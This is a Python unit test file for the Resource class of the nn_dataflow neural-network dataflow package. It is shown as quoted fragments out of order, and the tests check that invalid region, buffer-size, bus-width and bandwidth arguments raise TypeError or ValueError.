"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with",
"published by the Open Source Initiative. This program is distributed in the hope",
"2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region =",
"self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ =",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, )",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with",
"program is free software: you can redistribute it and/or modify it under the",
"self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2),",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'):",
"1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource:",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid",
"origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2,",
"PARTICULAR PURPOSE. See the BSD-3 License for more details. You should have received",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'):",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid",
"dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region,",
"type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0,",
"0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf.",
"test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"you can redistribute it and/or modify it under the terms of the Modified",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self):",
"size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512,",
"self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"of Stanford University This program is free software: you can redistribute it and/or",
"it under the terms of the Modified BSD-3 License as published by the",
"import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region =",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self):",
"'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2,",
".*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, )",
".*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None,",
"''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ =",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): '''",
"type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf,",
"'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8,",
"See the BSD-3 License for more details. You should have received a copy",
".*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512,",
"'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2,",
"131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux')",
"dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16,",
"Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2,",
") def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ =",
"type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self):",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. '''",
"'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid",
"type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region",
"it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty",
"= Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False,",
"a copy of the Modified BSD-3 License along with this program. If not,",
"8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. '''",
"without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.",
"def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. '''",
"origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid",
"import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): '''",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type",
"WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR",
"from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for",
"self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False,",
"'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth')",
"(16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth,",
") with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16,",
"received a copy of the Modified BSD-3 License along with this program. If",
"dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with",
"the hope that it will be useful, but WITHOUT ANY WARRANTY; without even",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. '''",
"will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of",
"no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError,",
"Board of Trustees of Stanford University This program is free software: you can",
"''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _",
"'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2,",
"Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"License for more details. You should have received a copy of the Modified",
"'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'):",
".*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128,",
"def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'):",
"''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC),",
"size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
".*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0,",
"test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region,",
"of the Modified BSD-3 License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.",
"with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import",
"1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
") with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region.",
"This program is free software: you can redistribute it and/or modify it under",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, )",
"test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2),",
"program is distributed in the hope that it will be useful, but WITHOUT",
"no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _",
"size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"2016-2019 by The Board of Trustees of Stanford University This program is free",
"DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux.",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): '''",
"\"\"\" $lic$ Copyright (C) 2016-2019 by The Board of Trustees of Stanford University",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2,",
"dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid",
"by The Board of Trustees of Stanford University This program is free software:",
"BSD-3 License as published by the Open Source Initiative. This program is distributed",
"with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region,",
"$lic$ Copyright (C) 2016-2019 by The Board of Trustees of Stanford University This",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region.",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource:",
"Copyright (C) 2016-2019 by The Board of Trustees of Stanford University This program",
"PURPOSE. See the BSD-3 License for more details. You should have received a",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource =",
"University This program is free software: you can redistribute it and/or modify it",
".*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'):",
"\"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core",
"= Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, )",
"be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY",
"Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region,",
") with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16),",
"src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self):",
") def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ =",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ =",
"self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux,",
"array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
